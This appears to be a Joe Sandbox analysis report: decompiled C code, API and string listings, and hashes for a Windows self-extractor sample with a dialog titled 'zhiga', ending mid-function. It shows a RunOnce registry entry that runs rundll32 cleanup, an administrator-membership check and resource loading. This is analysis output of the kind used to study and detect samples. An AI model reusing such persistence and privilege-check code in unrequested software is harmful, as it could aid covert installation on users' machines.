                                                                        				signed int _t65;
                                                                        
                                                                        				_t52 = __ecx;
                                                                        				_t23 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t23 ^ _t65;
                                                                        				_t62 = _a4;
                                                                        				_t50 = 0;
                                                                        				_t61 = __ecx;
                                                                        				_v276 = _t62;
                                                                        				 *((char*)(__ecx)) = 0;
                                                                        				if( *_t62 != 0x23) {
                                                                        					_t63 = 0x104;
                                                                        					goto L14;
                                                                        				} else {
                                                                        					_t64 = _t62 + 1;
                                                                        					_v269 = CharUpperA( *_t64);
                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                        					_t63 = 0x104;
                                                                        					_t34 = _v269;
                                                                        					if(_t34 == 0x53) {
                                                                        						L14:
                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                        						goto L15;
                                                                        					} else {
                                                                        						if(_t34 == 0x57) {
                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                        							goto L16;
                                                                        						} else {
                                                                        							_push(_t52);
                                                                        							_v288 = 0x104;
                                                                        							E00F81781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                        							_t59 = 0x104;
                                                                        							E00F8658A( &_v268, 0x104, _v276);
                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                        								L16:
                                                                        								_t59 = _t63;
                                                                        								E00F8658A(_t61, _t63, _v276);
                                                                        							} else {
                                                                        								if(RegQueryValueExA(_v284, 0xf81140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                        									_t45 = _v280;
                                                                        									if(_t45 != 2) {
                                                                        										L9:
                                                                        										if(_t45 == 1) {
                                                                        											goto L10;
                                                                        										}
                                                                        									} else {
                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                        											_t45 = _v280;
                                                                        											goto L9;
                                                                        										} else {
                                                                        											_t59 = 0x104;
                                                                        											E00F81680(_t61, 0x104,  &_v268);
                                                                        											L10:
                                                                        											_t50 = 1;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								RegCloseKey(_v284);
                                                                        								L15:
                                                                        								if(_t50 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00F86CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                        			}























                                                                        0x00f82773
                                                                        0x00f8277e
                                                                        0x00f82785
                                                                        0x00f8278a
                                                                        0x00f8278d
                                                                        0x00f82790
                                                                        0x00f82792
                                                                        0x00f82798
                                                                        0x00f8279d
                                                                        0x00f828b2
                                                                        0x00000000
                                                                        0x00f827a3
                                                                        0x00f827a3
                                                                        0x00f827af
                                                                        0x00f827c2
                                                                        0x00f827c8
                                                                        0x00f827cd
                                                                        0x00f827d5
                                                                        0x00f828b7
                                                                        0x00f828b9
                                                                        0x00000000
                                                                        0x00f827db
                                                                        0x00f827dd
                                                                        0x00f828aa
                                                                        0x00000000
                                                                        0x00f827e3
                                                                        0x00f827e3
                                                                        0x00f827ec
                                                                        0x00f827f8
                                                                        0x00f82803
                                                                        0x00f8280b
                                                                        0x00f82831
                                                                        0x00f828c3
                                                                        0x00f828c9
                                                                        0x00f828cd
                                                                        0x00f82837
                                                                        0x00f8285a
                                                                        0x00f8285c
                                                                        0x00f82865
                                                                        0x00f82892
                                                                        0x00f82895
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f82867
                                                                        0x00f82878
                                                                        0x00f8288c
                                                                        0x00000000
                                                                        0x00f8287a
                                                                        0x00f82880
                                                                        0x00f82885
                                                                        0x00f82897
                                                                        0x00f82899
                                                                        0x00f82899
                                                                        0x00f82878
                                                                        0x00f82865
                                                                        0x00f828a0
                                                                        0x00f828bf
                                                                        0x00f828c1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f828c1
                                                                        0x00f82831
                                                                        0x00f827dd
                                                                        0x00f827d5
                                                                        0x00f828e5

                                                                        APIs
                                                                        • CharUpperA.USER32(7E92E7A6,00000000,00000000,00000000), ref: 00F827A8
                                                                        • CharNextA.USER32(0000054D), ref: 00F827B5
                                                                        • CharNextA.USER32(00000000), ref: 00F827BC
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82829
                                                                        • RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82852
                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82870
                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F828A0
                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00F828AA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F828B9
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00F827E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                        • API String ID: 2659952014-2428544900
                                                                        • Opcode ID: af52a5f68144c05ae8cb9eca2e5313ec7edcc7ee12002e194ddcf87f74c8484e
                                                                        • Instruction ID: d7b0e3628f32fb5107f536d484f53446f5a43f7ea33ba94c891ab12707549c1b
                                                                        • Opcode Fuzzy Hash: af52a5f68144c05ae8cb9eca2e5313ec7edcc7ee12002e194ddcf87f74c8484e
                                                                        • Instruction Fuzzy Hash: 5F41A571E0012CAFEF64AB649C45AFE77BDEB15710F0440AAF545D2100DB749E86AFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 62%
                                                                        			E00F82267() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v836;
                                                                        				void* _v840;
                                                                        				int _v844;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				intOrPtr _t33;
                                                                        				void* _t38;
                                                                        				intOrPtr* _t42;
                                                                        				void* _t45;
                                                                        				void* _t47;
                                                                        				void* _t49;
                                                                        				signed int _t51;
                                                                        
                                                                        				_t19 =  *0xf88004; // 0x7e92e7a6
                                                                        				_t20 = _t19 ^ _t51;
                                                                        				_v8 = _t19 ^ _t51;
                                                                        				if( *0xf88530 != 0) {
                                                                        					_push(_t49);
                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                        						_push(_t38);
                                                                        						_v844 = 0x238;
                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                        							_push(_t47);
                                                                        							memset( &_v268, 0, 0x104);
                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        								E00F8658A( &_v268, 0x104, 0xf81140);
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        							E00F8171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                        							_t42 =  &_v836;
                                                                        							_t45 = _t42 + 1;
                                                                        							_pop(_t47);
                                                                        							do {
                                                                        								_t33 =  *_t42;
                                                                        								_t42 = _t42 + 1;
                                                                        							} while (_t33 != 0);
                                                                        							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                        						}
                                                                        						_t20 = RegCloseKey(_v840);
                                                                        						_pop(_t38);
                                                                        					}
                                                                        					_pop(_t49);
                                                                        				}
                                                                        				return E00F86CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                        			}



















                                                                        0x00f82272
                                                                        0x00f82277
                                                                        0x00f82279
                                                                        0x00f82283
                                                                        0x00f82289
                                                                        0x00f822ab
                                                                        0x00f822b1
                                                                        0x00f822c4
                                                                        0x00f822e0
                                                                        0x00f822e6
                                                                        0x00f822f5
                                                                        0x00f8230d
                                                                        0x00f8231c
                                                                        0x00f8231c
                                                                        0x00f82321
                                                                        0x00f8233a
                                                                        0x00f82342
                                                                        0x00f82348
                                                                        0x00f8234b
                                                                        0x00f8234c
                                                                        0x00f8234c
                                                                        0x00f8234e
                                                                        0x00f8234f
                                                                        0x00f8236e
                                                                        0x00f8236e
                                                                        0x00f8237a
                                                                        0x00f82380
                                                                        0x00f82380
                                                                        0x00f82381
                                                                        0x00f82381
                                                                        0x00f8238f

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00F822A3
                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 00F822D8
                                                                        • memset.MSVCRT ref: 00F822F5
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F82305
                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00F8236E
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F8237A
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F82321
                                                                        • wextract_cleanup1, xrefs: 00F8227C, 00F822CD, 00F82363
                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00F82299
                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00F8232D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                        • API String ID: 3027380567-490507210
                                                                        • Opcode ID: 500901cec70fe4e95f1d2f1b69edfec912e172d96d2ac7c019fc4f6d56ec277c
                                                                        • Instruction ID: 31250253b458fc3ab86304a07b99c451c071ae6b1201425c2b033351fb44ab4e
                                                                        • Opcode Fuzzy Hash: 500901cec70fe4e95f1d2f1b69edfec912e172d96d2ac7c019fc4f6d56ec277c
                                                                        • Instruction Fuzzy Hash: 9331C571A0021C6BDB21AB50DC49FEA7B7CEB15750F4401AAB50DEA050EA75AB89EB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00F83100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* _t8;
                                                                        				void* _t11;
                                                                        				void* _t15;
                                                                        				struct HWND__* _t16;
                                                                        				struct HWND__* _t33;
                                                                        				struct HWND__* _t34;
                                                                        
                                                                        				_t8 = _a8 - 0xf;
                                                                        				if(_t8 == 0) {
                                                                        					if( *0xf88590 == 0) {
                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                        						 *0xf88590 = 1;
                                                                        					}
                                                                        					L13:
                                                                        					return 0;
                                                                        				}
                                                                        				_t11 = _t8 - 1;
                                                                        				if(_t11 == 0) {
                                                                        					L7:
                                                                        					_push(0);
                                                                        					L8:
                                                                        					EndDialog(_a4, ??);
                                                                        					L9:
                                                                        					return 1;
                                                                        				}
                                                                        				_t15 = _t11 - 0x100;
                                                                        				if(_t15 == 0) {
                                                                        					_t16 = GetDesktopWindow();
                                                                        					_t33 = _a4;
                                                                        					E00F843D0(_t33, _t16);
                                                                        					SetDlgItemTextA(_t33, 0x834,  *0xf88d4c);
                                                                        					SetWindowTextA(_t33, "zhiga");
                                                                        					SetForegroundWindow(_t33);
                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                        					 *0xf888b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                        					SetWindowLongA(_t34, 0xfffffffc, E00F830C0);
                                                                        					return 1;
                                                                        				}
                                                                        				if(_t15 != 1) {
                                                                        					goto L13;
                                                                        				}
                                                                        				if(_a12 != 6) {
                                                                        					if(_a12 != 7) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L7;
                                                                        				}
                                                                        				_push(1);
                                                                        				goto L8;
                                                                        			}









                                                                        0x00f83108
                                                                        0x00f8310b
                                                                        0x00f831b7
                                                                        0x00f831ca
                                                                        0x00f831d0
                                                                        0x00f831d0
                                                                        0x00f831da
                                                                        0x00000000
                                                                        0x00f831da
                                                                        0x00f83111
                                                                        0x00f83114
                                                                        0x00f83136
                                                                        0x00f83136
                                                                        0x00f83138
                                                                        0x00f8313b
                                                                        0x00f83141
                                                                        0x00000000
                                                                        0x00f83143
                                                                        0x00f83116
                                                                        0x00f8311b
                                                                        0x00f8314b
                                                                        0x00f83151
                                                                        0x00f83158
                                                                        0x00f8316a
                                                                        0x00f83176
                                                                        0x00f8317d
                                                                        0x00f8318b
                                                                        0x00f8319e
                                                                        0x00f831a3
                                                                        0x00000000
                                                                        0x00f831ad
                                                                        0x00f83120
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8312a
                                                                        0x00f83134
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83134
                                                                        0x00f8312c
                                                                        0x00000000

                                                                        APIs
                                                                        • EndDialog.USER32(?,00000000), ref: 00F8313B
                                                                        • GetDesktopWindow.USER32 ref: 00F8314B
                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 00F8316A
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00F83176
                                                                        • SetForegroundWindow.USER32(?), ref: 00F8317D
                                                                        • GetDlgItem.USER32(?,00000834), ref: 00F83185
                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00F83190
                                                                        • SetWindowLongA.USER32(00000000,000000FC,00F830C0), ref: 00F831A3
                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00F831CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                        • String ID: zhiga
                                                                        • API String ID: 3785188418-3705506974
                                                                        • Opcode ID: a7072cb8c7411702f7fbdcc0732567a77d93f923634abdc61bc0a48d0245dfd1
                                                                        • Instruction ID: 9f80be09db7ffeee191898cd68db2de6920b69796e62a89e0ca2e1f9887b5527
                                                                        • Opcode Fuzzy Hash: a7072cb8c7411702f7fbdcc0732567a77d93f923634abdc61bc0a48d0245dfd1
                                                                        • Instruction Fuzzy Hash: C211B431A04619BBEB216F64AC0CBFA3A64FB46F70F100612F815D51F0DB749641FB42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E00F818A3(void* __edx, void* __esi) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				char _v20;
                                                                        				long _v24;
                                                                        				void* _v28;
                                                                        				void* _v32;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				signed int _t23;
                                                                        				long _t45;
                                                                        				void* _t49;
                                                                        				int _t50;
                                                                        				void* _t52;
                                                                        				signed int _t53;
                                                                        
                                                                        				_t51 = __esi;
                                                                        				_t49 = __edx;
                                                                        				_t23 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t23 ^ _t53;
                                                                        				_t25 =  *0xf88128; // 0x2
                                                                        				_t45 = 0;
                                                                        				_v12 = 0x500;
                                                                        				_t50 = 2;
                                                                        				_v16.Value = 0;
                                                                        				_v20 = 0;
                                                                        				if(_t25 != _t50) {
                                                                        					L20:
                                                                        					return E00F86CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                        				}
                                                                        				if(E00F817EE( &_v20) != 0) {
                                                                        					_t25 = _v20;
                                                                        					if(_v20 != 0) {
                                                                        						 *0xf88128 = 1;
                                                                        					}
                                                                        					goto L20;
                                                                        				}
                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                        					L17:
                                                                        					CloseHandle(_v28);
                                                                        					_t25 = _v20;
                                                                        					goto L20;
                                                                        				} else {
                                                                        					_push(__esi);
                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                        					if(_t52 == 0) {
                                                                        						L16:
                                                                        						_pop(_t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                        						L15:
                                                                        						LocalFree(_t52);
                                                                        						goto L16;
                                                                        					} else {
                                                                        						if( *_t52 <= 0) {
                                                                        							L14:
                                                                        							FreeSid(_v32);
                                                                        							goto L15;
                                                                        						}
                                                                        						_t15 = _t52 + 4; // 0x4
                                                                        						_t50 = _t15;
                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                        							_t45 = _t45 + 1;
                                                                        							_t50 = _t50 + 8;
                                                                        							if(_t45 <  *_t52) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L14;
                                                                        						}
                                                                        						 *0xf88128 = 1;
                                                                        						_v20 = 1;
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        			}


















                                                                        0x00f818a3
                                                                        0x00f818a3
                                                                        0x00f818ab
                                                                        0x00f818b2
                                                                        0x00f818b5
                                                                        0x00f818be
                                                                        0x00f818c0
                                                                        0x00f818c6
                                                                        0x00f818c7
                                                                        0x00f818ca
                                                                        0x00f818cf
                                                                        0x00f819c9
                                                                        0x00f819d8
                                                                        0x00f819d8
                                                                        0x00f818df
                                                                        0x00f819b8
                                                                        0x00f819bd
                                                                        0x00f819bf
                                                                        0x00f819bf
                                                                        0x00000000
                                                                        0x00f819bd
                                                                        0x00f818fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f81912
                                                                        0x00f819aa
                                                                        0x00f819ad
                                                                        0x00f819b3
                                                                        0x00000000
                                                                        0x00f81927
                                                                        0x00f81927
                                                                        0x00f81932
                                                                        0x00f81936
                                                                        0x00f819a9
                                                                        0x00f819a9
                                                                        0x00000000
                                                                        0x00f819a9
                                                                        0x00f8194c
                                                                        0x00f819a2
                                                                        0x00f819a3
                                                                        0x00000000
                                                                        0x00f8196e
                                                                        0x00f81970
                                                                        0x00f81999
                                                                        0x00f8199c
                                                                        0x00000000
                                                                        0x00f8199c
                                                                        0x00f81972
                                                                        0x00f81972
                                                                        0x00f81975
                                                                        0x00f81984
                                                                        0x00f81985
                                                                        0x00f8198a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8198c
                                                                        0x00f81991
                                                                        0x00f81996
                                                                        0x00000000
                                                                        0x00f81996
                                                                        0x00f8194c

                                                                        APIs
                                                                          • Part of subcall function 00F817EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F818DD), ref: 00F8181A
                                                                          • Part of subcall function 00F817EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F8182C
                                                                          • Part of subcall function 00F817EE: AllocateAndInitializeSid.ADVAPI32(00F818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F818DD), ref: 00F81855
                                                                          • Part of subcall function 00F817EE: FreeSid.ADVAPI32(?,?,?,?,00F818DD), ref: 00F81883
                                                                          • Part of subcall function 00F817EE: FreeLibrary.KERNEL32(00000000,?,?,?,00F818DD), ref: 00F8188A
                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00F818EB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00F818F2
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00F8190A
                                                                        • GetLastError.KERNEL32 ref: 00F81918
                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 00F8192C
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00F81944
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F81964
                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 00F8197A
                                                                        • FreeSid.ADVAPI32(?), ref: 00F8199C
                                                                        • LocalFree.KERNEL32(00000000), ref: 00F819A3
                                                                        • CloseHandle.KERNEL32(?), ref: 00F819AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                        • String ID:
                                                                        • API String ID: 2168512254-0
                                                                        • Opcode ID: 8524a9017b6cce86701870aa89d6d61a0b53c46788eb92c9b3d830699094614c
                                                                        • Instruction ID: 5668ca8bb04facf79600e992d2315e5fe07a90ca33389f38551c9af48e5d7a45
                                                                        • Opcode Fuzzy Hash: 8524a9017b6cce86701870aa89d6d61a0b53c46788eb92c9b3d830699094614c
                                                                        • Instruction Fuzzy Hash: 3D311971E00209EBEB20AFA5DC59AFFBBBCFB04750F10052AE545D2150DB349906EB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E00F8468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				long _t4;
                                                                        				void* _t11;
                                                                        				CHAR* _t14;
                                                                        				void* _t15;
                                                                        				long _t16;
                                                                        
                                                                        				_t14 = __ecx;
                                                                        				_t11 = __edx;
                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                        				_t16 = _t4;
                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                        					if(_t16 == 0) {
                                                                        						L5:
                                                                        						return 0;
                                                                        					}
                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                        					FreeResource(_t15);
                                                                        					return _t16;
                                                                        				}
                                                                        				return _t4;
                                                                        			}








                                                                        0x00f84699
                                                                        0x00f8469b
                                                                        0x00f846a9
                                                                        0x00f846af
                                                                        0x00f846b4
                                                                        0x00f846bc
                                                                        0x00f846f9
                                                                        0x00000000
                                                                        0x00f846f9
                                                                        0x00f846d9
                                                                        0x00f846dd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f846e5
                                                                        0x00f846ef
                                                                        0x00000000
                                                                        0x00f846f5
                                                                        0x00f846ff

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • memcpy_s.MSVCRT ref: 00F846E5
                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                        • String ID: TITLE$zhiga
                                                                        • API String ID: 3370778649-3314309
                                                                        • Opcode ID: a93137c2b41dd939d9e23fd44a476d501469d30be52240723983e37d3f339cd7
                                                                        • Instruction ID: 85ad2563db596ea34110a15934639ad1240650705a25ad884ba84c91a5fa9cc9
                                                                        • Opcode Fuzzy Hash: a93137c2b41dd939d9e23fd44a476d501469d30be52240723983e37d3f339cd7
                                                                        • Instruction Fuzzy Hash: A901F9326442097BF32027A55C0CFFB7E2CDBC6F61F080015FA49971C0D9719840A7B2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 57%
                                                                        			E00F817EE(intOrPtr* __ecx) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				void* _v24;
                                                                        				intOrPtr* _v28;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t14;
                                                                        				_Unknown_base(*)()* _t20;
                                                                        				long _t28;
                                                                        				void* _t35;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				signed int _t38;
                                                                        				intOrPtr* _t39;
                                                                        
                                                                        				_t14 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t14 ^ _t38;
                                                                        				_v12 = 0x500;
                                                                        				_t37 = __ecx;
                                                                        				_v16.Value = 0;
                                                                        				_v28 = __ecx;
                                                                        				_t28 = 0;
                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                        				if(_t36 != 0) {
                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                        					_v20 = _t20;
                                                                        					if(_t20 != 0) {
                                                                        						 *_t37 = 0;
                                                                        						_t28 = 1;
                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                        							_t37 = _t39;
                                                                        							 *0xf8a288(0, _v24, _v28);
                                                                        							_v20();
                                                                        							if(_t39 != _t39) {
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        							FreeSid(_v24);
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t36);
                                                                        				}
